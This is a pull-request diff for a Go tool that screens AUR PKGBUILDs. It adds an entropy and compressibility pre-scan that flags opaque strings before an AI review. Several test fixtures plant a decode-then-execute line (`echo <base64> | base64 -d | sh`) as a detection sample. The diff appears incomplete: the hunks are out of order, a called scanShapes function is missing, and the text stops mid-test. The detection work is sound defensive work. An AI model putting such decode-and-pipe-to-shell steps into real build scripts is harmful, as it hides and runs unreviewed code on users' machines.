### PR TITLE
Deterministic entropy pre-scan feeding the AI (prototype)

### DIFF
--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -357,7 +357,10 @@ Build Dependencies: {MAKE_DEPENDS}
 {ADDITIONAL_FILES}
 </additional_files>
 
+{STATIC_PRESCAN}
+
 <analysis_instructions>
+0. A deterministic pre-scan (in static_prescan above) has already computed string entropy directly from the files — it cannot be influenced by anything the package says. Treat its flags as trusted ground truth: explain every string it surfaced, and do not dismiss one without a concrete reason.
 1. Scan ALL files (PKGBUILD, .install, helper scripts) for the critical_patterns first.
 2. Pay closest attention to .install hooks — they are the most common execution vector.
 3. Confirm every source/URL matches the declared upstream and uses HTTPS or a pinned VCS revision.

--- a/internal/providers/claude.go
+++ b/internal/providers/claude.go
@@ -14,6 +14,7 @@ import (
 	"time"
 
 	"github.com/aaronsb/yay-friend/internal/config"
+	"github.com/aaronsb/yay-friend/internal/scanner"
 	"github.com/aaronsb/yay-friend/internal/types"
 )
 
@@ -591,7 +592,22 @@ func (c *ClaudeProvider) buildSimpleSecurityPrompt(pkgInfo types.PackageInfo) st
 	} else {
 		prompt = strings.ReplaceAll(prompt, "{ADDITIONAL_FILES}", "[No additional files present - this may be due to local PKGBUILD analysis limitations]")
 	}
-	
+
+	// Deterministic entropy pre-scan, injected as trusted ground truth. Scans
+	// the PKGBUILD plus any install script and helper files so a payload hidden
+	// in an .install hook is surfaced too. Injection-proof: computed from bytes.
+	var scanInput strings.Builder
+	scanInput.WriteString(pkgInfo.PKGBUILD)
+	if pkgInfo.InstallScript != "" {
+		scanInput.WriteString("\n")
+		scanInput.WriteString(pkgInfo.InstallScript)
+	}
+	for _, content := range pkgInfo.AdditionalFiles {
+		scanInput.WriteString("\n")
+		scanInput.WriteString(content)
+	}
+	prompt = strings.ReplaceAll(prompt, "{STATIC_PRESCAN}", scanner.Scan(scanInput.String()).AgentBlock())
+
 	return prompt
 }
 

--- a/internal/providers/claude_test.go
+++ b/internal/providers/claude_test.go
@@ -1,6 +1,38 @@
 package providers
 
-import "testing"
+import (
+	"strings"
+	"testing"
+
+	"github.com/aaronsb/yay-friend/internal/types"
+)
+
+func TestBuildPromptInjectsPrescan(t *testing.T) {
+	c := NewClaudeProvider()
+	pkg := types.PackageInfo{
+		Name:     "x",
+		PKGBUILD: `build(){ echo "TWFsaWNpb3VzUGF5bG9hZFdpdGhIaWdoRW50cm9weTEyMzQ1" | base64 -d | sh; }`,
+	}
+	prompt := c.buildSimpleSecurityPrompt(pkg)
+	if !strings.Contains(prompt, "<static_prescan>") {
+		t.Fatal("generated prompt is missing the static_prescan block")
+	}
+	if !strings.Contains(prompt, "unexplained_entropy") {
+		t.Errorf("pre-scan did not flag the planted payload in the prompt:\n%s", prompt)
+	}
+}
+
+func TestBuildPromptCleanPackageNoFlag(t *testing.T) {
+	c := NewClaudeProvider()
+	pkg := types.PackageInfo{
+		Name:     "hello",
+		PKGBUILD: "source=('x.tar.gz')\nsha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')",
+	}
+	prompt := c.buildSimpleSecurityPrompt(pkg)
+	if !strings.Contains(prompt, "No anomalies") {
+		t.Errorf("clean package should pre-scan clean; prompt:\n%s", prompt)
+	}
+}
 
 func TestExtractClaudeResult(t *testing.T) {
 	tests := []struct {

--- a/internal/scanner/entropy.go
+++ b/internal/scanner/entropy.go
@@ -1,13 +1,22 @@
 // Package scanner provides a deterministic, injection-proof pre-scan of a
 // PKGBUILD before the AI analysis. It surfaces facts an AI cannot be talked out
 // of: high-entropy strings that are not accounted for as checksums or PGP keys,
-// and checksum-shaped strings whose entropy does not match what their position
-// claims (a genuine digest is near-maximal entropy).
+// checksum-shaped strings whose entropy does not match their position, and the
+// silhouette of decode/download-then-execute constructs.
 //
-// The scanner renders no verdict — it hands the agent ground truth to assess.
+// NON-GOALS — read before extending. This scanner RECOGNIZES the shape of
+// hidden or obfuscated content; it does NOT decode, identify, or analyze
+// payloads. We are not in the business of defusing bombs, only recognizing them
+// and steering clear. Do not add base64/hex decoding, magic-byte identification,
+// dataflow tracing, or any logic that interprets what a suspicious string *is*.
+// The tool exists so a non-expert operator can avoid a package without having to
+// analyze it; the correct output is a steer ("opaque where it shouldn't be —
+// don't"), never a specimen. Opacity itself is the finding.
 package scanner
 
 import (
+	"bytes"
+	"compress/flate"
 	"fmt"
 	"math"
 	"regexp"
@@ -18,12 +27,21 @@ import (
 // tune. Entropy is Shannon entropy in bits per character.
 const (
 	// minTokenLen ignores short strings — real payloads/digests are long.
-	minTokenLen = 16
-	// encodedEntropy: a base64/encoded blob exceeds hex's 4.0 bits/char ceiling.
-	encodedEntropy = 4.1
+	minTokenLen = 20
+	// encodedEntropy: the floor at which we call a token opaque. Real encoded
+	// payloads run ~4.5-6.0 bits/char; file paths and mixed-case identifiers cap
+	// around ~4.2, so this deliberately sits above them to stay high-precision —
+	// a scanner that flags every normal package trains the operator to ignore it.
+	encodedEntropy = 4.5
 	// lowChecksumEntropy: a genuine digest is near-maximal (~3.9-4.0 for hex);
 	// a checksum-shaped token below this is not actually random.
 	lowChecksumEntropy = 3.3
+	// minCompressLen: below this, flate overhead makes the ratio meaningless.
+	minCompressLen = 24
+	// structuredRatio: a token that compresses below this is structured/ordered
+	// (repeating, dictionary-like), not opaque — suppress it even if its
+	// character entropy is high. Catches order that Shannon entropy misses.
+	structuredRatio = 0.60
 )
 
 // checksumHexLen maps a hex length to the digest that produces it.
@@ -31,29 +49,34 @@ var checksumHexLen = map[int]string{
 	32: "md5", 40: "sha1", 56: "sha224", 64: "sha256", 96: "sha384", 128: "sha512",
 }
 
-// Kind classifies why a token was surfaced.
+// Kind classifies why something was surfaced.
 type Kind string
 
 const (
-	// KindUnexplainedEntropy: a high-entropy string not in a checksum/key
-	// position — a possible encoded payload.
+	// KindUnexplainedEntropy: a high-entropy, opaque string not in a
+	// checksum/key position — a possible encoded payload.
 	KindUnexplainedEntropy Kind = "unexplained_entropy"
-	// KindLowEntropyChecksum: a checksum-shaped string that is not random
-	// enough to be a genuine digest — a value crafted to look like a checksum.
+	// KindLowEntropyChecksum: a checksum-shaped string not random enough to be a
+	// genuine digest — a value crafted to look like a checksum.
 	KindLowEntropyChecksum Kind = "low_entropy_checksum"
-	// KindExcessEntropyCount: more high-entropy blobs than there are sources to
-	// justify them — a possible decryptor+payload pair hiding among checksums.
+	// KindExcessEntropyCount: more opaque blobs than sources justify — a
+	// possible decryptor+payload pair hiding among checksums.
 	KindExcessEntropyCount Kind = "excess_entropy_count"
+	// KindDecodeExecShape: the silhouette of a decode/download-then-execute
+	// construct (recognized, never decoded).
+	KindDecodeExecShape Kind = "decode_exec_shape"
 )
 
 // Finding is one surfaced observation. It carries no severity verdict.
 type Finding struct {
-	Kind    Kind
-	Line    int
-	Token   string  // may be truncated for display
-	Entropy float64 // bits per character
-	Length  int
-	Note    string
+	Kind     Kind
+	Line     int
+	Zone     string  // "build()", "package()", "toplevel", …
+	Token    string  // may be truncated for display
+	Entropy  float64 // bits per character
+	Compress float64 // compressed/original ratio; ~1.0 = incompressible/opaque
+	Length   int
+	Note     string
 }
 
 // Report is the full deterministic pre-scan result.
@@ -62,16 +85,22 @@ type Report struct {
 	Sources          int // non-SKIP source() entries
 	Checksums        int // values seen in *sums=() arrays
 	PGPKeys          int // validpgpkeys=() entries
-	HighEntropyBlobs int // high-entropy tokens outside checksum/key positions
+	HighEntropyBlobs int // opaque tokens outside checksum/key positions
+	DecodeExec       int // decode/download-then-execute constructs
 }
 
 var (
-	sumsArrayRe = regexp.MustCompile(`(?s)\b(?:ck|md5|sha1|sha224|sha256|sha384|sha512|b2)sums=\(([^)]*)\)`)
-	pgpKeysRe   = regexp.MustCompile(`(?s)validpgpkeys=\(([^)]*)\)`)
-	sourceRe    = regexp.MustCompile(`(?s)\bsource=\(([^)]*)\)`)
-	// A run of base64/hex-ish characters — the shape an encoded blob or digest takes.
-	blobRe = regexp.MustCompile(`[A-Za-z0-9+/=_-]{` + fmt.Sprint(minTokenLen) + `,}`)
-	hexRe  = regexp.MustCompile(`^[0-9a-fA-F]+$`)
+	sumsArrayRe  = regexp.MustCompile(`(?s)\b(?:ck|md5|sha1|sha224|sha256|sha384|sha512|b2)sums\w*=\(([^)]*)\)`)
+	pgpKeysRe    = regexp.MustCompile(`(?s)validpgpkeys=\(([^)]*)\)`)
+	sourceRe     = regexp.MustCompile(`(?s)\bsource\w*=\(([^)]*)\)`)
+	arrayOpenRe  = regexp.MustCompile(`^\s*(?:source|validpgpkeys|(?:ck|md5|sha1|sha224|sha256|sha384|sha512|b2)sums)\w*=\(`)
+	funcHeadRe   = regexp.MustCompile(`^\s*([a-zA-Z0-9_]+)\s*\(\)\s*\{?`)
+	// blobRe deliberately excludes '/' and '=': paths (/opt/a/b) and assignments
+	// (var=value, Key=Value) then split into short, harmless words instead of one
+	// long "high-entropy" token. Base64 padding '=' and the occasional '/' in a
+	// real payload are lost, but the remaining run stays long and opaque.
+	blobRe = regexp.MustCompile(`[A-Za-z0-9+_-]{` + fmt.Sprint(minTokenLen) + `,}`)
+	hexRe        = regexp.MustCompile(`^[0-9a-fA-F]+$`)
 )
 
 // shannon returns the Shannon entropy of s in bits per character.
@@ -95,7 +124,34 @@ func shannon(s string) float64 {
 	return h
 }
 
-// arrayValues pulls the quoted/bare tokens from a bash array body.
+// compressibility returns compressed/original size. ~1.0 means incompressible
+// (opaque: random, encrypted, or packed); well below 1.0 means structured.
+func compressibility(s string) float64 {
+	if len(s) == 0 {
+		return 1
+	}
+	var buf bytes.Buffer
+	w, _ := flate.NewWriter(&buf, flate.BestCompression)
+	_, _ = w.Write([]byte(s))
+	_ = w.Close()
+	return float64(buf.Len()) / float64(len(s))
+}
+
+// opaque reports whether a non-hex token looks like an encoded payload: high
+// character entropy AND not structured/compressible.
+func opaque(tok string) (bool, float64, float64) {
+	e := shannon(tok)
+	c := compressibility(tok)
+	if e < encodedEntropy {
+		return false, e, c
+	}
+	// A long token that compresses well is ordered, not opaque — suppress.
+	if len(tok) >= minCompressLen && c < structuredRatio {
+		return false, e, c
+	}
+	return true, e, c
+}
+
 func arrayValues(body string) []string {
 	var out []string
 	for _, f := range strings.Fields(body) {
@@ -107,7 +163,6 @@ func arrayValues(body string) []string {
 	return out
 }
 
-// lineOf returns the 1-based line number where substr first appears in text.
 func lineOf(text, substr string) int {
 	idx := strings.Index(text, substr)
 	if idx < 0 {
@@ -123,12 +178,11 @@ func truncate(s string, n int) string {
 	return s[:n] + "…"
 }
 
-// Scan runs the deterministic entropy pre-scan over a PKGBUILD.
+// Scan runs the deterministic pre-scan over a PKGBUILD (plus any concatenated
+// install/helper files).
 func Scan(pkgbuild string) *Report {
 	r := &Report{}
-
-	// Positions that are EXPECTED to hold high-entropy strings.
-	allow := map[string]bool{}
+	allow := map[string]bool{} // positions expected to hold high-entropy strings
 
 	for _, m := range sumsArrayRe.FindAllStringSubmatch(pkgbuild, -1) {
 		for _, v := range arrayValues(m[1]) {
@@ -137,76 +191,100 @@ func Scan(pkgbuild string) *Report {
 			}
 			r.Checksums++
 			allow[v] = true
-
-			// A checksum-shaped token whose entropy is too low to be a genuine
-			// digest is suspicious — it may be a crafted/encoded value.
-			if _, isKnownLen := checksumHexLen[len(v)]; isKnownLen && hexRe.MatchString(v) {
+			if _, known := checksumHexLen[len(v)]; known && hexRe.MatchString(v) {
 				if e := shannon(v); e < lowChecksumEntropy {
 					r.Findings = append(r.Findings, Finding{
-						Kind:    KindLowEntropyChecksum,
-						Line:    lineOf(pkgbuild, v),
-						Token:   truncate(v, 48),
-						Entropy: e,
-						Length:  len(v),
-						Note:    "checksum-shaped but not random enough to be a genuine digest",
+						Kind: KindLowEntropyChecksum, Line: lineOf(pkgbuild, v),
+						Token: truncate(v, 48), Entropy: e, Compress: compressibility(v),
+						Length: len(v), Zone: "checksum",
+						Note: "checksum-shaped but not random enough to be a genuine digest",
 					})
 				}
 			}
 		}
 	}
-
 	for _, m := range pgpKeysRe.FindAllStringSubmatch(pkgbuild, -1) {
 		for _, v := range arrayValues(m[1]) {
 			r.PGPKeys++
 			allow[v] = true
 		}
 	}
-
 	if m := sourceRe.FindStringSubmatch(pkgbuild); m != nil {
 		r.Sources = len(arrayValues(m[1]))
 	}
 
-	// Surface high-entropy blobs that are NOT in an allowlisted position.
-	seen := map[string]bool{}
-	for _, tok := range blobRe.FindAllString(pkgbuild, -1) {
-		if allow[tok] || seen[tok] {
-			continue
-		}
-		// A bare hex run of exactly a checksum length is almost certainly a
-		// digest the author placed outside a *sums array (or in a comment);
-		// leave those to the AI rather than crying wolf.
-		e := shannon(tok)
-		isHex := hexRe.MatchString(tok)
-		if isHex {
-			// Pure hex tops out at 4.0 bits/char, so it never trips the
-			// encodedEntropy gate; only flag non-hex (base64-charset) blobs,
-			// which cannot be plain digests.
-			continue
-		}
-		if e >= encodedEntropy {
-			seen[tok] = true
-			r.HighEntropyBlobs++
-			r.Findings = append(r.Findings, Finding{
-				Kind:    KindUnexplainedEntropy,
-				Line:    lineOf(pkgbuild, tok),
-				Token:   truncate(tok, 48),
-				Entropy: e,
-				Length:  len(tok),
-				Note:    "high-entropy string, not a checksum or PGP key",
-			})
-		}
-	}
+	r.scanBlobs(pkgbuild, allow)
+	r.scanShapes(pkgbuild)
 
-	// Count anomaly: more unexplained high-entropy blobs than sources to justify
-	// them suggests a hidden pair (e.g. decryptor + payload).
+	// Count anomaly: more opaque blobs than sources to justify them suggests a
+	// hidden pair (e.g. decryptor + payload).
 	if r.HighEntropyBlobs > 0 && r.HighEntropyBlobs > r.Sources {
 		r.Findings = append(r.Findings, Finding{
 			Kind: KindExcessEntropyCount,
-			Note: fmt.Sprintf("%d unexplained high-entropy strings for %d source(s)", r.HighEntropyBlobs, r.Sources),
+			Note: fmt.Sprintf("%d opaque high-entropy strings for %d source(s)", r.HighEntropyBlobs, r.Sources),
 		})
 	}
-
 	return r
+}
+
+// scanBlobs walks the file line by line so it can zone each token (skip comments
+// and source/checksum arrays, and tag which function body a token sits in).
+func (r *Report) scanBlobs(pkgbuild string, allow map[string]bool) {
+	seen := map[string]bool{}
+	zone := "toplevel"
+	braceDepth := 0
+	inArray := false
+
+	for i, line := range strings.Split(pkgbuild, "\n") {
+		trimmed := strings.TrimSpace(line)
+
+		// Track (and skip) multi-line source/checksum/key arrays.
+		if !inArray && arrayOpenRe.MatchString(trimmed) {
+			inArray = true
+		}
+		if inArray {
+			if strings.Contains(line, ")") {
+				inArray = false
+			}
+			continue
+		}
+		// Skip whole-line comments (avoids breaking ${x#...} parameter expansion).
+		if strings.HasPrefix(trimmed, "#") {
+			continue
+		}
+		// Zone tracking (approximate — a heuristic, not a bash parser).
+		if m := funcHeadRe.FindStringSubmatch(trimmed); m != nil && strings.Contains(line, "{") {
+			zone = m[1] + "()"
+		}
+		braceDepth += strings.Count(line, "{") - strings.Count(line, "}")
+		if braceDepth <= 0 {
+			braceDepth = 0
+			zone = "toplevel"
+		}
+
+		for _, tok := range blobRe.FindAllString(line, -1) {
+			if allow[tok] || seen[tok] || hexRe.MatchString(tok) {
+				continue // hex tops out at 4.0/char and can't be distinguished from a digest here
+			}
+			ok, e, c := opaque(tok)
+			if !ok {
+				continue
+			}
+			seen[tok] = true
+			r.HighEntropyBlobs++
+			r.Findings = append(r.Findings, Finding{
+				Kind: KindUnexplainedEntropy, Line: i + 1, Zone: zone,
+				Token: truncate(tok, 48), Entropy: e, Compress: c, Length: len(tok),
+				Note: "opaque high-entropy string, not a checksum or PGP key",
+			})
+		}
+	}
+}
+
+// Concerning reports the classic hidden-payload silhouette: an opaque blob and a
+// decode/execute construct present together.
+func (r *Report) Concerning() bool {
+	return r.HighEntropyBlobs > 0 && r.DecodeExec > 0
 }
 
 // Clean reports whether the scan surfaced nothing worth the agent's attention.
@@ -217,7 +295,7 @@ func (r *Report) Clean() bool { return len(r.Findings) == 0 }
 func (r *Report) AgentBlock() string {
 	var b strings.Builder
 	b.WriteString("<static_prescan>\n")
-	b.WriteString("Deterministic entropy pre-scan (cannot be influenced by the PKGBUILD's contents).\n")
+	b.WriteString("Deterministic pre-scan (computed from bytes; cannot be influenced by the package's contents).\n")
 	if r.Clean() {
 		fmt.Fprintf(&b, "No anomalies. Excluded as expected-random: %d checksum value(s), %d PGP key(s).\n", r.Checksums, r.PGPKeys)
 		b.WriteString("</static_prescan>")
@@ -225,14 +303,20 @@ func (r *Report) AgentBlock() string {
 	}
 	fmt.Fprintf(&b, "Excluded as expected-random: %d checksum value(s), %d PGP key(s). Flagged:\n", r.Checksums, r.PGPKeys)
 	for _, f := range r.Findings {
-		if f.Kind == KindExcessEntropyCount {
+		switch f.Kind {
+		case KindExcessEntropyCount:
 			fmt.Fprintf(&b, "  • [count] %s\n", f.Note)
-			continue
+		case KindDecodeExecShape:
+			fmt.Fprintf(&b, "  • line %d [%s] in %s — %s\n", f.Line, f.Kind, f.Zone, f.Note)
+		default:
+			fmt.Fprintf(&b, "  • line %d [%s] in %s: %q (entropy %.2f/char, compress %.2f, len %d) — %s\n",
+				f.Line, f.Kind, f.Zone, f.Token, f.Entropy, f.Compress, f.Length, f.Note)
 		}
-		fmt.Fprintf(&b, "  • line %d [%s] %q (entropy %.2f/char, len %d) — %s\n",
-			f.Line, f.Kind, f.Token, f.Entropy, f.Length, f.Note)
 	}
-	b.WriteString("Assess whether any flagged string is an encoded payload or a value masquerading as a checksum.\n")
+	if r.Concerning() {
+		b.WriteString("Note: an opaque string AND a decode/execute construct are both present — the classic hidden-payload shape.\n")
+	}
+	b.WriteString("Assess and steer the user; do not attempt to decode or identify any flagged content.\n")
 	b.WriteString("</static_prescan>")
 	return b.String()
 }

--- a/internal/scanner/entropy.go
+++ b/internal/scanner/entropy.go
@@ -1,0 +1,238 @@
+// Package scanner provides a deterministic, injection-proof pre-scan of a
+// PKGBUILD before the AI analysis. It surfaces facts an AI cannot be talked out
+// of: high-entropy strings that are not accounted for as checksums or PGP keys,
+// and checksum-shaped strings whose entropy does not match what their position
+// claims (a genuine digest is near-maximal entropy).
+//
+// The scanner renders no verdict — it hands the agent ground truth to assess.
+package scanner
+
+import (
+	"fmt"
+	"math"
+	"regexp"
+	"strings"
+)
+
+// Heuristic thresholds. Deliberately conservative and named so they are easy to
+// tune. Entropy is Shannon entropy in bits per character.
+const (
+	// minTokenLen ignores short strings — real payloads/digests are long.
+	minTokenLen = 16
+	// encodedEntropy: a base64/encoded blob exceeds hex's 4.0 bits/char ceiling.
+	encodedEntropy = 4.1
+	// lowChecksumEntropy: a genuine digest is near-maximal (~3.9-4.0 for hex);
+	// a checksum-shaped token below this is not actually random.
+	lowChecksumEntropy = 3.3
+)
+
+// checksumHexLen maps a hex length to the digest that produces it.
+var checksumHexLen = map[int]string{
+	32: "md5", 40: "sha1", 56: "sha224", 64: "sha256", 96: "sha384", 128: "sha512",
+}
+
+// Kind classifies why a token was surfaced.
+type Kind string
+
+const (
+	// KindUnexplainedEntropy: a high-entropy string not in a checksum/key
+	// position — a possible encoded payload.
+	KindUnexplainedEntropy Kind = "unexplained_entropy"
+	// KindLowEntropyChecksum: a checksum-shaped string that is not random
+	// enough to be a genuine digest — a value crafted to look like a checksum.
+	KindLowEntropyChecksum Kind = "low_entropy_checksum"
+	// KindExcessEntropyCount: more high-entropy blobs than there are sources to
+	// justify them — a possible decryptor+payload pair hiding among checksums.
+	KindExcessEntropyCount Kind = "excess_entropy_count"
+)
+
+// Finding is one surfaced observation. It carries no severity verdict.
+type Finding struct {
+	Kind    Kind
+	Line    int
+	Token   string  // may be truncated for display
+	Entropy float64 // bits per character
+	Length  int
+	Note    string
+}
+
+// Report is the full deterministic pre-scan result.
+type Report struct {
+	Findings         []Finding
+	Sources          int // non-SKIP source() entries
+	Checksums        int // values seen in *sums=() arrays
+	PGPKeys          int // validpgpkeys=() entries
+	HighEntropyBlobs int // high-entropy tokens outside checksum/key positions
+}
+
+var (
+	sumsArrayRe = regexp.MustCompile(`(?s)\b(?:ck|md5|sha1|sha224|sha256|sha384|sha512|b2)sums=\(([^)]*)\)`)
+	pgpKeysRe   = regexp.MustCompile(`(?s)validpgpkeys=\(([^)]*)\)`)
+	sourceRe    = regexp.MustCompile(`(?s)\bsource=\(([^)]*)\)`)
+	// A run of base64/hex-ish characters — the shape an encoded blob or digest takes.
+	blobRe = regexp.MustCompile(`[A-Za-z0-9+/=_-]{` + fmt.Sprint(minTokenLen) + `,}`)
+	hexRe  = regexp.MustCompile(`^[0-9a-fA-F]+$`)
+)
+
+// shannon returns the Shannon entropy of s in bits per character.
+func shannon(s string) float64 {
+	if s == "" {
+		return 0
+	}
+	var freq [256]float64
+	for i := 0; i < len(s); i++ {
+		freq[s[i]]++
+	}
+	n := float64(len(s))
+	h := 0.0
+	for _, c := range freq {
+		if c == 0 {
+			continue
+		}
+		p := c / n
+		h -= p * math.Log2(p)
+	}
+	return h
+}
+
+// arrayValues pulls the quoted/bare tokens from a bash array body.
+func arrayValues(body string) []string {
+	var out []string
+	for _, f := range strings.Fields(body) {
+		f = strings.Trim(f, "'\"")
+		if f != "" {
+			out = append(out, f)
+		}
+	}
+	return out
+}
+
+// lineOf returns the 1-based line number where substr first appears in text.
+func lineOf(text, substr string) int {
+	idx := strings.Index(text, substr)
+	if idx < 0 {
+		return 0
+	}
+	return strings.Count(text[:idx], "\n") + 1
+}
+
+func truncate(s string, n int) string {
+	if len(s) <= n {
+		return s
+	}
+	return s[:n] + "…"
+}
+
+// Scan runs the deterministic entropy pre-scan over a PKGBUILD.
+func Scan(pkgbuild string) *Report {
+	r := &Report{}
+
+	// Positions that are EXPECTED to hold high-entropy strings.
+	allow := map[string]bool{}
+
+	for _, m := range sumsArrayRe.FindAllStringSubmatch(pkgbuild, -1) {
+		for _, v := range arrayValues(m[1]) {
+			if strings.EqualFold(v, "SKIP") {
+				continue
+			}
+			r.Checksums++
+			allow[v] = true
+
+			// A checksum-shaped token whose entropy is too low to be a genuine
+			// digest is suspicious — it may be a crafted/encoded value.
+			if _, isKnownLen := checksumHexLen[len(v)]; isKnownLen && hexRe.MatchString(v) {
+				if e := shannon(v); e < lowChecksumEntropy {
+					r.Findings = append(r.Findings, Finding{
+						Kind:    KindLowEntropyChecksum,
+						Line:    lineOf(pkgbuild, v),
+						Token:   truncate(v, 48),
+						Entropy: e,
+						Length:  len(v),
+						Note:    "checksum-shaped but not random enough to be a genuine digest",
+					})
+				}
+			}
+		}
+	}
+
+	for _, m := range pgpKeysRe.FindAllStringSubmatch(pkgbuild, -1) {
+		for _, v := range arrayValues(m[1]) {
+			r.PGPKeys++
+			allow[v] = true
+		}
+	}
+
+	if m := sourceRe.FindStringSubmatch(pkgbuild); m != nil {
+		r.Sources = len(arrayValues(m[1]))
+	}
+
+	// Surface high-entropy blobs that are NOT in an allowlisted position.
+	seen := map[string]bool{}
+	for _, tok := range blobRe.FindAllString(pkgbuild, -1) {
+		if allow[tok] || seen[tok] {
+			continue
+		}
+		// A bare hex run of exactly a checksum length is almost certainly a
+		// digest the author placed outside a *sums array (or in a comment);
+		// leave those to the AI rather than crying wolf.
+		e := shannon(tok)
+		isHex := hexRe.MatchString(tok)
+		if isHex {
+			// Pure hex tops out at 4.0 bits/char, so it never trips the
+			// encodedEntropy gate; only flag non-hex (base64-charset) blobs,
+			// which cannot be plain digests.
+			continue
+		}
+		if e >= encodedEntropy {
+			seen[tok] = true
+			r.HighEntropyBlobs++
+			r.Findings = append(r.Findings, Finding{
+				Kind:    KindUnexplainedEntropy,
+				Line:    lineOf(pkgbuild, tok),
+				Token:   truncate(tok, 48),
+				Entropy: e,
+				Length:  len(tok),
+				Note:    "high-entropy string, not a checksum or PGP key",
+			})
+		}
+	}
+
+	// Count anomaly: more unexplained high-entropy blobs than sources to justify
+	// them suggests a hidden pair (e.g. decryptor + payload).
+	if r.HighEntropyBlobs > 0 && r.HighEntropyBlobs > r.Sources {
+		r.Findings = append(r.Findings, Finding{
+			Kind: KindExcessEntropyCount,
+			Note: fmt.Sprintf("%d unexplained high-entropy strings for %d source(s)", r.HighEntropyBlobs, r.Sources),
+		})
+	}
+
+	return r
+}
+
+// Clean reports whether the scan surfaced nothing worth the agent's attention.
+func (r *Report) Clean() bool { return len(r.Findings) == 0 }
+
+// AgentBlock renders the pre-scan as a block to inject into the AI prompt. It
+// states facts only; the AI decides what they mean.
+func (r *Report) AgentBlock() string {
+	var b strings.Builder
+	b.WriteString("<static_prescan>\n")
+	b.WriteString("Deterministic entropy pre-scan (cannot be influenced by the PKGBUILD's contents).\n")
+	if r.Clean() {
+		fmt.Fprintf(&b, "No anomalies. Excluded as expected-random: %d checksum value(s), %d PGP key(s).\n", r.Checksums, r.PGPKeys)
+		b.WriteString("</static_prescan>")
+		return b.String()
+	}
+	fmt.Fprintf(&b, "Excluded as expected-random: %d checksum value(s), %d PGP key(s). Flagged:\n", r.Checksums, r.PGPKeys)
+	for _, f := range r.Findings {
+		if f.Kind == KindExcessEntropyCount {
+			fmt.Fprintf(&b, "  • [count] %s\n", f.Note)
+			continue
+		}
+		fmt.Fprintf(&b, "  • line %d [%s] %q (entropy %.2f/char, len %d) — %s\n",
+			f.Line, f.Kind, f.Token, f.Entropy, f.Length, f.Note)
+	}
+	b.WriteString("Assess whether any flagged string is an encoded payload or a value masquerading as a checksum.\n")
+	b.WriteString("</static_prescan>")
+	return b.String()
+}

--- a/internal/scanner/entropy_test.go
+++ b/internal/scanner/entropy_test.go
@@ -1,0 +1,105 @@
+package scanner
+
+import (
+	"strings"
+	"testing"
+)
+
+// realSha256 is an actual digest (sha256 of the empty string) — high entropy.
+const realSha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+
+func hasKind(r *Report, k Kind) bool {
+	for _, f := range r.Findings {
+		if f.Kind == k {
+			return true
+		}
+	}
+	return false
+}
+
+func TestCleanPackageIsSilent(t *testing.T) {
+	pkg := `pkgname=hello
+source=("https://ftp.gnu.org/gnu/hello/hello-2.12.tar.gz")
+sha256sums=('` + realSha256 + `')
+
+build() {
+  cd "$srcdir/hello-2.12"
+  ./configure --prefix=/usr
+  make
+}`
+	r := Scan(pkg)
+	if !r.Clean() {
+		t.Fatalf("clean package flagged: %+v", r.Findings)
+	}
+	if r.Checksums != 1 {
+		t.Errorf("Checksums = %d, want 1", r.Checksums)
+	}
+}
+
+func TestRealChecksumNotFlagged(t *testing.T) {
+	// A genuine high-entropy digest in a sums array must never be surfaced.
+	pkg := "sha256sums=('" + realSha256 + "')\nsource=('x.tar.gz')"
+	r := Scan(pkg)
+	if hasKind(r, KindLowEntropyChecksum) {
+		t.Error("genuine sha256 flagged as low-entropy checksum")
+	}
+	if hasKind(r, KindUnexplainedEntropy) {
+		t.Error("genuine sha256 flagged as unexplained entropy")
+	}
+}
+
+func TestLowEntropyChecksumFlagged(t *testing.T) {
+	// 64 hex chars but almost no entropy — not a real digest.
+	fake := strings.Repeat("ab", 32) // len 64, entropy ~1.0
+	pkg := "sha256sums=('" + fake + "')\nsource=('x.tar.gz')"
+	r := Scan(pkg)
+	if !hasKind(r, KindLowEntropyChecksum) {
+		t.Fatalf("low-entropy checksum not flagged: %+v", r.Findings)
+	}
+}
+
+func TestEncodedPayloadFlagged(t *testing.T) {
+	// A base64 blob sitting in the build body — a possible encoded payload.
+	payload := "TWFsaWNpb3VzUGF5bG9hZFdpdGhIaWdoRW50cm9weTEyMzQ1Njc4OTBhYmNkZWY"
+	pkg := `source=('x.tar.gz')
+sha256sums=('` + realSha256 + `')
+build() {
+  echo "` + payload + `" | base64 -d | sh
+}`
+	r := Scan(pkg)
+	if !hasKind(r, KindUnexplainedEntropy) {
+		t.Fatalf("encoded payload not flagged: %+v", r.Findings)
+	}
+	// And the real checksum in the same file must remain silent.
+	if hasKind(r, KindLowEntropyChecksum) {
+		t.Error("real checksum wrongly flagged alongside payload")
+	}
+}
+
+func TestExcessCountFlagged(t *testing.T) {
+	// Two high-entropy blobs, one source — a possible decryptor+payload pair.
+	a := "TWFsaWNpb3VzUGF5bG9hZFdpdGhIaWdoRW50cm9weUFBQUJCQ0ND"
+	b := "RGVjcnlwdG9yS2V5V2l0aExvdHNPZkVudHJvcHlYWVpaWlpaWlla"
+	pkg := `source=('x.tar.gz')
+_a="` + a + `"
+_b="` + b + `"`
+	r := Scan(pkg)
+	if r.HighEntropyBlobs < 2 {
+		t.Fatalf("expected >=2 high-entropy blobs, got %d: %+v", r.HighEntropyBlobs, r.Findings)
+	}
+	if !hasKind(r, KindExcessEntropyCount) {
+		t.Fatalf("excess count not flagged: %+v", r.Findings)
+	}
+}
+
+func TestAgentBlockShape(t *testing.T) {
+	clean := Scan("sha256sums=('" + realSha256 + "')\nsource=('x.tar.gz')")
+	if !strings.Contains(clean.AgentBlock(), "No anomalies") {
+		t.Error("clean agent block should say 'No anomalies'")
+	}
+	dirty := Scan(`build() { echo "TWFsaWNpb3VzUGF5bG9hZFdpdGhIaWdoRW50cm9weTEyMzQ1" | base64 -d | sh; }`)
+	block := dirty.AgentBlock()
+	if !strings.Contains(block, "<static_prescan>") || !strings.Contains(block, "unexplained_entropy") {
+		t.Errorf("dirty agent block missing expected content:\n%s", block)
+	}
+}

--- a/internal/scanner/entropy_test.go
+++ b/internal/scanner/entropy_test.go
@@ -92,6 +92,97 @@ _b="` + b + `"`
 	}
 }
 
+func TestCompressibleStringNotFlagged(t *testing.T) {
+	// High character entropy (32 distinct symbols) but a repeated block — Shannon
+	// entropy alone would flag it; compressibility correctly suppresses it.
+	block := "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef"
+	structured := strings.Repeat(block, 4) // len 128, entropy ~5.0, highly compressible
